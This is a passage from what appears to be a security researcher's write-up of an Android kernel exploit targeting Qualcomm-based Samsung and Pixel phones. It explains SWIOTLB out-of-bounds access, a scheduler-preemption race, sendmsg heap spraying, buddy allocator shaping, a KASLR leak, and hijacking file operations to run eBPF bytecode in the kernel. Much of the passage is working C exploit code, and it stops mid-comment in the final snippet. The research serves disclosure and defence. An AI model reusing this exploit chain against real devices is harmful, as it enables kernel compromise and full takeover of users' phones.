Provided I can control the scatterlist that specifies the location and size of the SWIOTLB, I can specify the size to be larger than the original DMA buffer to cause an out-of-bounds access (I still need to point to the SWIOTLB to pass the checks). Of course, it is no good to just cause an out-of-bounds access; I need to be able to read back the out-of-bounds data in the case of a read access and control the data that I write in the case of a write access. This issue will be addressed in the next section.
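
As for what the replacement scatterlist needs to contain, a sketch looks like this (the struct mirrors include/linux/scatterlist.h for a typical arm64 build without CONFIG_DEBUG_SG and with CONFIG_NEED_SG_DMA_LENGTH; treat the layout as an assumption and verify it against the target kernel). How such a replacement is actually delivered is covered later, in the object replacement sections.

#include <stdint.h>
#include <string.h>

/* User-space mirror of struct scatterlist (layout is an assumption). */
struct fake_scatterlist {
    uint64_t page_link;    /* bit 0x2 marks the last entry of the list */
    uint32_t offset;
    uint32_t length;
    uint64_t dma_address;  /* must fall inside [io_tlb_start, io_tlb_end) to pass is_swiotlb_buffer */
    uint32_t dma_length;   /* unchecked: oversized to reach memory behind the buffers */
    uint32_t pad;
};

static void build_fake_sgl(void *payload, uint64_t swiotlb_paddr, uint32_t oob_len)
{
    struct fake_scatterlist sg = {
        .page_link   = 0x2,            /* terminate the list after one entry */
        .length      = oob_len,
        .dma_address = swiotlb_paddr,  /* e.g. 0xf3800000 from the Pixel 4 boot log above */
        .dma_length  = oob_len,        /* larger than the DMA buffer: out-of-bounds copy */
    };
    memcpy(payload, &sg, sizeof(sg));
}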

Allocating a Software Input Output Translation Lookaside Buffer

As it turns out, the SWIOTLB is actually very rarely used. For one reason or another, either because most devices are capable of reading 64 bit addresses, or because the DMA buffer synchronization is implemented with arm_smmu rather than swiotlb, I only managed to allocate a SWIOTLB using the adsprpc driver. The adsprpc driver is used for communicating with the DSP (digital signal processor), which is a separate processor on Qualcomm’s snapdragon chipset. The DSP and adsprpc are themselves vast topics with many security implications, and they are out of the scope of this post.

Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver is for. It allows the kernel to communicate with the DSP (which is running on a separate kernel and OS altogether, so this is truly "remote") to invoke functions, allocate memory and retrieve results from the DSP.

While access to the adsprpc driver from third-party apps is not granted in the default SELinux settings and, as such, I’m unable to use it on Google’s Pixel phones, it is still enabled on many different phones running Qualcomm’s snapdragon SoC (system on chip). For example, Samsung phones allow access to adsprpc from third party Apps, which allows the exploit in this post to be launched directly from a third party App or from a compromised beta version of Chrome (or any other compromised App). On phones where adsprpc access is not allowed, such as the Pixel 4, an additional bug that compromises a service that can access adsprpc is required to launch this exploit. There are various services that can access the adsprpc driver and are reachable directly from third party Apps, such as hal_neuralnetworks, which is implemented as a closed source service in android.hardware.neuralnetworks@1.x-service-qti. I did not investigate this path, so I’ll assume Samsung phones in the rest of this post.

With adsprpc, the most obvious ioctl to use for allocating SWIOTLB is the FASTRPC_IOCTL_MMAP, which calls fastrpc_mmap_create to attach a DMA buffer that I supplied:

static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
	unsigned int attr, uintptr_t va, size_t len, int mflags,
	struct fastrpc_mmap **ppmap)
{
    ...
	} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
		VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
		if (err)
			goto bail;
		VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
        ...
		map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
        ...

However, the call seems to always fail when fastrpc_mmap_on_dsp is called, which will then detach the DMA buffer from the adsprpc driver and remove the SWIOTLB that was just allocated. While it is possible to work with a temporary buffer like this by racing with multiple threads, it would be better if I could allocate a permanent SWIOTLB.

Another possibility is to use the get_args function, which will also invoke fastrpc_mmap_create:

static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
    ...
	for (i = bufs; i < bufs + handles; i++) {
        ...
		if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
			dmaflags = FASTRPC_DMAHANDLE_NOMAP;
		VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
				FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
				&ctx->maps[i]));
        ...
	}

The get_args function is used in the various FASTRPC_IOCTL_INVOKE_* calls for passing arguments to functions invoked on the DSP. Under normal circumstances, a corresponding put_args will be called to detach the DMA buffer from the adsprpc driver. However, if the remote invocation fails, the call to put_args will be skipped and the clean up will be deferred to the time when the adsprpc file is closed:

static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
				   uint32_t kernel,
				   struct fastrpc_ioctl_invoke_crc *inv)
{
    ...
	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
		PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
		VERIFY(err, 0 == get_args(kernel, ctx));                  //<----- get_args
		PERF_END);
		if (err)
			goto bail;
	}
    ...
 wait:
	if (kernel) {
      ....
	} else {
		interrupted = wait_for_completion_interruptible(&ctx->work);
		VERIFY(err, 0 == (err = interrupted));
		if (err)
			goto bail;                                        //<----- invocation failed and jump to bail directly
	}
    ...
	VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra));    //<------ detach the arguments
	PERF_END);
    ...
 bail:
    ...
	return err;
}

So by using FASTRPC_IOCTL_INVOKE_* with an invalid remote function, it is easy to allocate a SWIOTLB and keep it alive until I choose to close the /dev/adsprpc-smd file that was used to make the ioctl call. This is the only part where the adsprpc driver is needed, and we’re now set up to start writing the exploit.

Now that I can allocate SWIOTLB buffers that map to DMA buffers I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.

  1. First allocate a number of DMA buffers. By manipulating the ion heap (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
  2. Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that DMA_1 occupies the first SWIOTLB (which means all other SWIOTLB buffers will be allocated behind it); call this SWIOTLB_1. This can be done easily as SWIOTLB buffers are simply allocated as a contiguous array.
  3. Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
  4. As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1.

The following figure illustrates this with a simplified case of two DMA buffers.

figure

Replacing the sg_table

So far, I have planned an exploitation strategy based on the assumption that I already have control of the scatterlist sgl of the free’d sg_table. In order to actually gain control of it, I need to replace the free’d sg_table with a suitable object. This turns out to be the most complicated part of the exploit. While there are well-known kernel heap spraying techniques that allow us to replace a free’d object with controlled data (for example sendmsg and setxattr), they cannot be applied directly here, as the sgl of the free’d sg_table needs to be a valid pointer that points to controlled data. Without a way to leak a heap address, I’ll not be able to use these heap spraying techniques to construct a valid object. With this bug alone, there is almost no hope of getting an info leak at this stage. The other alternative is to look for other suitable objects to replace the sg_table. A CodeQL query can be used to help look for suitable objects:

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc"))
      and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() < 128 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      f.getByteOffset() = 0
select fc, t, fc.getLocation()

In this query, I look for objects created via kmalloc, kzalloc or kcalloc that are of size smaller than 128 (same bucket as sg_table) and have a pointer field as the first field. However, I wasn't able to find a suitable object, although filename allocated in getname_flags came close:

struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
	struct filename *result;
    ...
	if (unlikely(len == EMBEDDED_NAME_MAX)) {
        ...
		result = kzalloc(size, GFP_KERNEL);
		if (unlikely(!result)) {
			__putname(kname);
			return ERR_PTR(-ENOMEM);
		}
		result->name = kname;
		len = strncpy_from_user(kname, filename, PATH_MAX);
        ...

with name pointing to a user controlled string; it can be reached using, for example, the mknod syscall. However, not being able to use null characters turns out to be too much of a restriction here.

Just-in-time object replacement

Let’s take a look at how the free’d sg_table is used, say, in __ion_dma_buf_begin_cpu_access. It seems that at some point in the execution, the sgl field is taken from the sg_table, and the sg_table itself will no longer be used; only the cached pointer value of sgl is used:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
					  enum dma_data_direction direction,
					  bool sync_only_mapped)
{
    
		if (sync_only_mapped)
			tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,    //<------- `sgl` got passed, and `table` never used again
						  a->table->nents,
						  &buffer->vmas,
						  direction, true);
		else
			dma_sync_sg_for_cpu(a->dev, a->table->sgl,
					    a->table->nents, direction);

While source code can be misleading, as automatic function inlining is common in kernel code (in fact ion_sgl_sync_mapped is inlined), the bottom line is that, at some point, the value of sgl will be cached in a register and the state of the original sg_table will no longer affect the code path. So if I am able to first replace a->table with another sg_table, then deleting this new sg_table using sg_free_table will also cause the sgl to be deleted, but of course, there will be clean up logic that sets sgl to NULL. But what if I set up another thread to delete this new sg_table after sgl has already been cached in a register? Then it won’t matter if sgl is set to NULL, because the value in the register will still be pointing to the original scatterlist, and as this scatterlist is now free’d, this means I will now get a use-after-free of sgl directly in ion_sgl_sync_mapped. I can then use sendmsg to replace it with controlled data. There is one major problem with this though: as the time between sgl being cached in a register and the time when it is used again is very short, it is normally not possible to fit the entire sg_table replacement sequence within such a short time frame, even if I race the slowest cpu core against the fastest.

To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.

To ensure that each task (thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can be run. This kind of interruption and stopping of a task is called preemption (where the interrupted task is preempted). A task can also put itself on hold to allow other tasks to run, such as when it is waiting for some I/O input, or when it calls sched_yield(). In this case, we say that the task is voluntarily preempted. Preemption can happen inside syscalls such as ioctl calls as well, and on Android, tasks can be preempted except in some critical regions (e.g. while holding a spinlock). This means that a thread running the DMA_BUF_IOCTL_SYNC ioctl call can be interrupted after the sgl field is cached in a register and be put on hold. The default behavior, however, will not normally give us much control over when the preemption happens, nor over how long the task is put on hold.

To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task runs with the SCHED_NORMAL priority, but a lower priority, SCHED_IDLE, can also be set using the sched_setscheduler call (or pthread_setschedparam for threads). Furthermore, it can also be pinned to a cpu with sched_setaffinity, which will only allow it to run on a specific cpu. By pinning two tasks, one with SCHED_NORMAL priority and the other with SCHED_IDLE priority, to the same cpu, it is possible to control the timing of the preemption as follows.

  1. First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task had been waiting on. This will wake up the SCHED_NORMAL task and cause it to preempt the SCHED_IDLE task, and because of the task priority, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.
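
A sketch of this affinity and priority setup, using the standard scheduler APIs mentioned above:

#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to one cpu and give it the requested scheduling
 * policy: SCHED_NORMAL for the "blocker" task that waits on the pipe,
 * SCHED_IDLE for the task that runs DMA_BUF_IOCTL_SYNC. */
static void pin_self(int cpu, int policy)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);      /* 0 = the calling thread */

    struct sched_param param = { .sched_priority = 0 };
    sched_setscheduler(0, policy, &param);        /* SCHED_NORMAL or SCHED_IDLE */
}

The SCHED_NORMAL task then blocks on an empty pipe; writing a byte to that pipe from another cpu wakes it up, and because it has the higher priority on this cpu, it preempts the SCHED_IDLE task and keeps it on hold by spinning.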

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in a register, then sends data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by sgl that is now cached in a register. The main task then replaces this object with controlled data using sendmsg heap spraying (sketched below). This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.

figure

The following figure illustrates what happens in the real world.

figure

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing even work on both the Galaxy A71 and the Pixel 4. Even when the race fails, it does not result in a crash. It can, however, crash if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.
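
Step 8 relies on sendmsg heap spraying to reclaim the free’d scatterlist with controlled bytes. A minimal sketch of the well-known blocking variant of this technique follows (not the author’s exact code); note that the first bytes of the sprayed object are constrained by the cmsghdr that has to get past the kernel’s control-message checks:

#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Blocking sendmsg spray (sketch). msg_control is copied verbatim into a
 * kmalloc'ed kernel buffer of size msg_controllen before the protocol's
 * sendmsg runs; by filling the peer's receive queue first, the final send
 * blocks while that buffer is still live, so the controlled allocation stays
 * in place until we let the call finish. The leading cmsghdr (cmsg_len
 * spanning the buffer, cmsg_level != SOL_SOCKET) is needed to get past
 * __scm_send and overlaps the first fields of the replaced object.
 */
static void spray_one(const void *data, size_t data_len)
{
    unsigned char payload[64];                 /* pick the kmalloc bucket of the target object */
    memset(payload, 0, sizeof(payload));

    struct cmsghdr *hdr = (struct cmsghdr *)payload;
    hdr->cmsg_len   = sizeof(payload);
    hdr->cmsg_level = SOL_IP;                  /* anything other than SOL_SOCKET is skipped */
    hdr->cmsg_type  = 0;
    memcpy(CMSG_DATA(hdr), data, data_len);    /* e.g. the fake scatterlist; must fit after the header */

    int sv[2];
    socketpair(AF_UNIX, SOCK_DGRAM, 0, sv);

    char c = 0;
    while (send(sv[0], &c, 1, MSG_DONTWAIT) > 0)   /* fill the queue so the next send blocks */
        ;

    struct msghdr msg = { 0 };
    msg.msg_control    = payload;
    msg.msg_controllen = sizeof(payload);
    sendmsg(sv[0], &msg, 0);                   /* blocks in the kernel, holding the allocation */
    close(sv[0]);
    close(sv[1]);
}

In practice this would be run from a number of dedicated threads, since each call blocks until its sockets are closed or the peer drains the queue.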

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a SWIOTLB, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that allocates buffers with addresses greater than 32 bits. The locations of the various ion heaps can be seen in the kernel log during boot; the following is from a Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heaps are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that do not have a fixed address. These are the heaps that have addresses higher than 32 bits. For the exploit, I’ll use the system heap.

DMA buffers on the system heap are allocated via the ion_system_heap_allocate function call. It’ll first try to allocate a buffer from a preallocated memory pool. If the pool has run out, it’ll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
    ...
	return page;
}

and recycle the pages back to the pool after the buffer is freed.

This latter case is more interesting, because if the memory is allocated from the initial pool, then any out-of-bounds read/write is likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter, order, specifies the size of the requested memory, and the allocator will return a memory block consisting of 2^order contiguous pages. In order to exploit an overflow of memory allocated by the buddy allocator (a DMA buffer from the system heap), I’ll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmalloc, kzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of /proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
...
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th column indicates the size of the slabs in pages. So for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3=8), to use as a new slab. So by exhausting the slab, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over read/write kernel objects allocated via kmalloc and co.

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and uses it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it’ll look for free blocks in the next order up, split one in half and add it to the freelist of the requested order. If the next order has no free blocks either, it’ll try to find space in the next higher order, and so on. So by continually allocating blocks of a given order, eventually the freelist will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on the Pixel 4, it seems that after allocating a certain number of DMA buffers from the ion system heap, the allocations follow a very predictable pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocation will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.

figure

So by simply creating a large number of DMA buffers in the ion system heap, the likelihood is that the last allocated buffer will be allocated in front of a "hole" of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits in it.

The heap spraying strategy is then very simple. First allocate a sufficient number of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large number of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.
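
A sketch of that strategy, reusing the ion_alloc() helper from earlier (the counts and the heap id are illustrative only and need tuning per device):

#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

extern int ion_alloc(int ion_fd, uint64_t len, uint32_t heap_id_mask);  /* sketched earlier */

#define N_DMA_BUFS  64     /* illustrative: enough to start carving up the high-order blocks */
#define N_FILES     2048   /* illustrative: enough opens to force fresh slab pages */

static int dma_fds[N_DMA_BUFS];
static int file_fds[N_FILES];

/* Shape the buddy allocator: ion buffers first, so the last one sits in front
 * of a hole; then a burst of kernel object allocations so a fresh slab page
 * lands in that hole. Opening /dev/null is one cheap way to do the latter,
 * since each open() allocates a struct file from its slab cache. */
static void shape_heap(int ion_fd, uint32_t system_heap_mask)
{
    for (int i = 0; i < N_DMA_BUFS; i++)
        dma_fds[i] = ion_alloc(ion_fd, 4 * 4096, system_heap_mask);

    for (int i = 0; i < N_FILES; i++)
        file_fds[i] = open("/dev/null", O_RDONLY);
}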

Defeating KASLR and leaking the address of a DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
{
    ...
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)

which is of size 560 and will persist until the /dev/binder file is closed. So it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................
...

The 08af 5109 80ff ffff in the second part of the first line looks like an address that corresponds to kernel code. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So it looks like these are the file structs of the binder files that I opened, and what I’m seeing here is the field f_ops that points to binder_fops. Moreover, the 32 bytes after f_ops are the same for every file struct of the same type, which offers a pattern to identify these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
    ...
	struct list_head	wait_list;
...
};

which is a standard doubly linked list in linux:

struct list_head {
	struct list_head *next, *prev;
};

When wait_list is initialized, the head of the list is simply a pointer to itself, which means that by reading the next or prev pointer of the wait_list, I can obtain the address of the file struct itself. This in turn lets me work out the address of the DMA buffer that I control, because the offset between the file struct and the buffer is known (by looking at its offset in the data that I dumped; in this example, the offset is 0x11020).
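Putting this together, recovering the addresses from the dump could look roughly like the following sketch; the field offsets and the unslid binder_fops address are build-specific placeholders, and dump offset 0 is assumed to correspond to the start of the controlled DMA buffer:

#include <stdint.h>
#include <string.h>

static uint64_t read64(const uint8_t *dump, size_t off)
{
    uint64_t v;
    memcpy(&v, dump + off, sizeof(v));
    return v;
}

/* file_off:     offset of the identified file struct in the dump (0x11020 above)
 * fops_off:     offset of f_ops within struct file                (build-specific)
 * waitlist_off: offset of f_pos_lock.wait_list within struct file (build-specific)
 * fops_static:  unslid address of binder_fops from the kernel image */
static void leak_addresses(const uint8_t *dump, size_t file_off,
                           size_t fops_off, size_t waitlist_off,
                           uint64_t fops_static,
                           uint64_t *kaslr_slide, uint64_t *dma_buf_addr)
{
    uint64_t binder_fops = read64(dump, file_off + fops_off);
    uint64_t wl_next     = read64(dump, file_off + waitlist_off);
    uint64_t file_addr   = wl_next - waitlist_off;   /* an empty list head points to itself */

    *kaslr_slide  = binder_fops - fops_static;
    *dma_buf_addr = file_addr - file_off;            /* the dump starts at our DMA buffer */
}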

By using the address of binder_fops, it is easy to work out the KASLR slide and defeat KASLR, and by knowing the address of a DMA buffer that I control, I can use it to store a fake file_operations (the "vtable" of a file struct) and overwrite the f_ops of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer of the file that corresponds to this file struct (which I own), so that it now points to a fake file_operations struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I'll use "the ultimate ROP gadget" that was used in An iOS hacker tries Android by Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

To invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This allows me to perform arbitrary memory loads/stores and to call arbitrary kernel functions with up to five arguments and a 64 bit return value.
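For illustration, the bytecode stored in the DMA buffer can be as simple as the following program, which copies one 64-bit word from an arbitrary kernel address to a scratch address; the instruction encodings are the standard eBPF ones, written out by hand since the kernel's helper macros are not available to userspace:

#include <stdint.h>
#include <stddef.h>

struct bpf_insn {                      /* standard eBPF instruction layout */
    uint8_t  code;
    uint8_t  dst_reg:4;
    uint8_t  src_reg:4;
    int16_t  off;
    int32_t  imm;
};

/* Emit: r1 = src_kaddr; r2 = dst_kaddr; r3 = *(u64 *)r1; *(u64 *)r2 = r3; exit */
static size_t build_copy64(struct bpf_insn *prog, uint64_t src_kaddr, uint64_t dst_kaddr)
{
    size_t n = 0;
    prog[n++] = (struct bpf_insn){ .code = 0x18, .dst_reg = 1,                  /* lddw r1, src */
                                   .imm = (int32_t)(uint32_t)src_kaddr };
    prog[n++] = (struct bpf_insn){ .imm = (int32_t)(uint32_t)(src_kaddr >> 32) };
    prog[n++] = (struct bpf_insn){ .code = 0x18, .dst_reg = 2,                  /* lddw r2, dst */
                                   .imm = (int32_t)(uint32_t)dst_kaddr };
    prog[n++] = (struct bpf_insn){ .imm = (int32_t)(uint32_t)(dst_kaddr >> 32) };
    prog[n++] = (struct bpf_insn){ .code = 0x79, .dst_reg = 3, .src_reg = 1 };  /* ldxdw r3, [r1+0] */
    prog[n++] = (struct bpf_insn){ .code = 0x7b, .dst_reg = 2, .src_reg = 3 };  /* stxdw [r2+0], r3 */
    prog[n++] = (struct bpf_insn){ .code = 0x95 };                              /* exit */
    return n;
}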

There is, however, one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example Lifting the (Hyper) Visor: Bypassing Samsung's Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Bypasses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much detail about RKP, the two parts that are relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structures, such as the credentials of a process, so that they are effectively read only.

Point one means that even though I can hijack the f_ops pointer of my file struct, I cannot jump to an arbitrary location. However, it is still possible to jump to the start of any function. The practical implication is that while I can control the function that I call, I may not be able to control the call arguments. Point two means that the usual shortcut of overwriting the credentials of my own process with those of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I'll briefly explain later, but for the exploit of this post, I'll stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the file_operations, which contains a whole array of function pointers that are thin wrappers around various syscalls, means that it is likely I can find a file operation with a 64 bit second argument that I can control by making the appropriate syscall. In fact, I don't even need to look that far. The first operation, llseek, fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
    ...

This function takes a 64 bit integer, loff_t, as its second argument and can be invoked by calling the lseek64 syscall:

off_t lseek64(int fd, off_t offset, int whence);

where offset translates directly into the loff_t passed to llseek. So by overwriting the f_ops pointer of my file so that its llseek field points to __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even needing to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.
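A sketch of what the trigger then looks like from userspace; the names (the fake_fops layout, oob_write(), the various kernel addresses) are made up for illustration and stand for the primitives built earlier:

#define _LARGEFILE64_SOURCE
#include <stdint.h>
#include <string.h>
#include <unistd.h>

struct fake_fops {                      /* minimal stand-in for struct file_operations */
    uint64_t owner;
    uint64_t llseek;                    /* the only entry we need; the rest stays zero */
};

extern void oob_write(uint64_t kaddr, uint64_t value);  /* OOB write primitive from the UAF */

static void hijack_llseek(struct fake_fops *fake,        /* mapped DMA buffer */
                          uint64_t fake_kaddr,           /* its kernel address */
                          uint64_t bytecode_kaddr,       /* eBPF program in the same buffer */
                          uint64_t victim_fops_field,    /* kernel address of &file->f_op */
                          uint64_t bpf_prog_run32,       /* __bpf_prog_run32 after adding the slide */
                          int victim_fd)
{
    memset(fake, 0, sizeof(*fake));
    fake->llseek = bpf_prog_run32;

    /* redirect the victim file's f_ops to the fake table in the DMA buffer */
    oob_write(victim_fops_field, fake_kaddr);

    /* every lseek64 on the fd now calls __bpf_prog_run32(file, offset):
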